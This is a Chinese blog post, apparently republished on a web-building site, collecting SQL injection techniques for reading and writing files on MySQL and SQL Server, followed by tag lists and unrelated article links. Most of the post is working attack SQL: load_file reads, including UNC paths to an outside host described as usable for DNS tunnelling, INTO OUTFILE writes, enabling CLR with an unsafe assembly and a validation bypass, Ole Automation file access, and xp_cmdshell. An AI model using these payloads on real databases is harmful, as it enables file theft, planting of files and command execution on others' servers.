关于SQL注入中文件读写的方法总结

前言

SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容，具体的一起来看看。

一、MySQL

读文件

常见的读文件，可以用16进制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'

select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure

create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序，导致失败，下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过，首先加载一个有效的.NET的二进制文件，然后追加文件即可，下面是绕过方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件（测试失败，无bcp.exe）

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass，Oracle太坑了~~~几乎都受到PL/SQL的限制，暂时不讨论

总结

以上就是关于SQL注入中文件的读写方法总结，希望本文的内容对大家的学习或者工作能带来一定的帮助，如果有疑问大家可以留言交流。

# sql注入  # sql注入文件写入  # sql注入语句  # 利用SQL注入漏洞登录后台的实现方法  # 有效防止SQL注入的5种方法总结  # 利用SQL注入漏洞拖库的方法  # SQL注入中绕过 单引号 限制继续注入  # sql注入之手工注入示例详解  # MySQL 及 SQL 注入与防范方法  # 防御SQL注入的方法总结  # SQL数据库的高级sql注入的一些知识  # SQL 注入式攻击的终极防范  # sql注入教程之类型以及提交注入  # 的是  # 加载  # 这一  # 也有  # 一句  # 两种  # 可以用  # 他会  # 这篇文章  # 可以利用  # 数据库中  # 暂时不  # 一起来看看  # 可用于  # 有疑问  # insert  # bulk  # exec  # CLR  # table 

相关文章： 建站之星2.7模板：企业网站建设与h5定制设计专题  个人摄影网站制作流程,摄影爱好者都去什么网站？  婚礼视频制作网站,学习*后期制作的网站有哪些？  ,怎么在广州志愿者网站注册？  广东专业制作网站有哪些,广东省能源集团有限公司官网？  头像制作网站在线观看,除了站酷，还有哪些比较好的设计网站？  如何快速搭建高效WAP手机网站？  较简单的网站制作软件有哪些,手机版网页制作用什么软件？  制作网站怎么制作,*游戏网站怎么搭建？  大同网页,大同瑞慈医院官网？  淘宝制作网站有哪些,淘宝网官网主页？  网站广告牌制作方法,街上的广告牌，横幅，用PS还是其他软件做的？  家庭建站与云服务器建站，如何选择更优？  如何在万网自助建站中设置域名及备案？  清单制作人网站有哪些,近日“兴风作浪的姑奶奶”引起很多人的关注这是什么事情？  广州商城建站系统开发成本与周期如何控制？  香港服务器如何优化才能显著提升网站加载速度？  如何通过老薛主机一键快速建站？  建站之星如何保障用户数据免受黑客入侵？  如何在万网ECS上快速搭建专属网站？  学生网站制作软件,一个12岁的学生写小说，应该去什么样的网站？  如何在阿里云域名上完成建站全流程？  建站之星导航如何优化提升用户体验？  如何彻底删除建站之星生成的Banner？  设计网站制作公司有哪些,制作网页教程？  建站主机服务器选型指南与性能优化方案解析  完全自定义免费建站平台：主题模板在线生成一站式服务  如何配置WinSCP新建站点的密钥验证步骤？  宝塔面板创建网站无法访问？如何快速排查修复？  制作销售网站教学视频,销售网站有哪些？  建站主机是什么？如何选择适合的建站主机？  如何在腾讯云服务器快速搭建个人网站？  c++ stringstream用法详解_c++字符串与数字转换利器  公司网站制作费用多少,为公司建立一个网站需要哪些费用？  建站之星如何快速解决建站难题？  学校建站服务器如何选型才能满足性能需求？  c++怎么用jemalloc c++替换默认内存分配器【性能】  如何快速搭建二级域名独立网站？  简单实现Android文件上传  北京的网站制作公司有哪些,哪个视频网站最好？  如何解决ASP生成WAP建站中文乱码问题？  如何正确下载安装西数主机建站助手？  C#如何在一个XML文件中查找并替换文本内容  如何快速生成橙子建站落地页链接？  如何选择适配移动端的WAP自助建站平台？  如何制作网站标识牌,动态网站如何制作（教程）？  深圳网站制作费用多少钱,读秀，深圳文献港这样的网站很多只提供网上试读，但有些人只要提供试读的文章就能全篇下载，这个是怎么弄的？  网站插件制作软件免费下载,网页视频怎么下到本地插件？  小型网站建站如何选择虚拟主机？  如何快速搭建高效简练网站？